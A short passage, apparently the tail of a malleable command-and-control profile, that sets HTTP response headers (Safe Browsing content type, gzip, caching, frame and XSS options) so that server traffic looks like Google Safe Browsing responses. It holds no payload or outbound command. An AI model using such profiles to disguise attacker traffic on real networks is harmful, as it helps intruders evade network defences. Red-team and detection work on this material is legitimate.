"application/vnd.google.safebrowsing-chunk"; 69 | header "X-Content-Type-Options" "nosniff"; 70 | header "Content-Encoding" "gzip"; 71 | header "X-XSS-Protection" "1; mode=block"; 72 | header "X-Frame-Options" "SAMEORIGIN"; 73 | header "Cache-Control" "public,max-age=172800"; 74 | header "Age" "1222"; 75 | header "Alternate-Protocol" "80:quic"; 76 | output { 77 | print; 78 | } 79 | } 80 | } 81 | 82 | --------------------------------------------------------------------------------